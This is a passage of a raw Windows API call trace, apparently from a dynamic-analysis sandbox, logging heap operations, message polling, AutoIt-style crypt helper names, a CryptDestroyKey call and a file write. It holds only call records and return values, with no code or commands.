pbData=0x2e80330*, pdwDataLen=0x8cef60*=0x11118) returned 1 [0240.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0240.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0240.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0240.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0240.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0240.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0240.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0240.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0240.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0240.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0240.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0240.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0240.020] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0240.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0240.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0240.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0240.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0240.020] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.020] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0240.020] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0240.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0240.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0240.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0240.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0240.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0240.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0240.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0240.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0240.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0240.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.024] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0240.024] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.024] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0240.024] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0240.025] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0240.025] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.025] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0240.025] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0240.025] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.025] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.025] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.036] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0x11118, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0x11118, lpOverlapped=0x0) returned 1 [0240.226] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.227] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.227] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0240.227] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0240.227] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.227] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0240.227] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0240.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51148, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0240.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0240.228] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0240.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0240.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0240.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0240.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0240.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0240.228] CryptDestroyKey (hKey=0xa87250) returned 1 [0240.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0240.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0240.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0240.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0240.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0240.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0240.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0240.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0240.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0240.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0240.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0240.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0240.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0240.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0240.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0240.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0240.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0240.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0240.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0240.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0240.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0240.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0240.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0240.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0240.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0240.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0240.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0240.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0240.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0240.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0240.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0240.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0240.231] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0240.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0240.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0240.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0240.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0240.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0240.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0240.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0240.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0240.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0240.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0240.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0240.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0240.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.233] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0240.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0240.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0240.233] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0240.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0240.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0240.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0240.233] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0240.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0240.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0240.233] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0240.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0240.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0240.234] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0240.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0240.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0240.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0240.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0240.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0240.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0240.235] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.235] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0240.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0240.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0240.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0240.235] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0240.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0240.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0240.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0240.236] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0240.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0240.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0240.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0240.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0240.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0240.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0240.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0240.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0240.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0240.236] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0240.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0240.236] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0240.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0240.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0240.237] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0240.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0240.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0240.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0240.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0240.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0240.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0240.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0240.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0240.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0240.237] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0240.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0240.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.238] RtlAllocateHeap 